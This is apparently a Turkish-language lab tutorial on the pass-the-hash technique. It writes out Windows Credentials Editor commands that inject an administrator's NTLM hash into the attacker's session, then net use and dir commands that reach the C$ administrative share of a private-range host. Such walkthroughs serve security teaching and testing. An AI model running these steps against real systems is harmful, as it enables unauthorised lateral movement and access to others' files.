Varsayılan durumda bir bilgisayarın C: diskine uzaktan erişim sağlayabilmek için o bilgisayara ait bir yönetici hesabının kimlik bilgileri gerekmektedir.
Bu bilgisayarda yönetici olan hesabın adının Vedat, Vedat kullanıcısının parola özetinin ise AAD3B435B51404EEAAD3B435B51404EE:FA320A5CF3D53B4E74BBAC73047186F2 olduğunu varsayalım. Bu bilgilerle, hedef sistemin disk sistemine erişim sağlamak için WCE aracı kullanılacaktır.
WCE aracının “-s” seçeneği ile, RAM üzerinde bulunan oturumun NTLM kimlik bilgileri değiştirilebilir. Normalde RAM üzerinde Saldirgan adlı hesabın parolasının açık hali ve özet hali bulunmaktadır:
wce -l
wce -w
WCE aracı ile RAM üzerindeki oturuma ait NTLM bilgileri Vedat hesabına ait kimlik bilgileri (Kullanıcı adı ve parola özeti) ile değiştirilebilir. WCE aracı “-s” seçeneği ile çalıştırıldıktan sonra, Saldirgan hesabına ait parolanın NTLM özet bilgilerinin, Vedat’ın parolasına ait NTLM özet bilgileri ile değiştiği görülmektedir. Bunun yanında parolanın açık halinin değişmediği de görülmektedir.
wce -s WORKGROUP:Vedat:AAD3B435B51404EEAAD3B435B51404EE:FA320A5CF3D53B4E74BBAC73047186F2
wce -l
wce -w
Hedef sistemin paylaşılan kaynaklarına (yönetimsel paylaşımlar) erişim sağlayabilmek için, öncelikle bağlantının kurulması gerekmektedir.
net use \\172.16.67.202\C$ /USER:WORKGROUP\Vedat
net use
Bağlantı kurulduktan sonra, hedef sistemin disk sistemine komut satırından erişim sağlanabildiği görülmektedir.
dir \\172.16.67.202\C$
Dosya sistemine arayüzden de bağlanabildiği görülmektedir.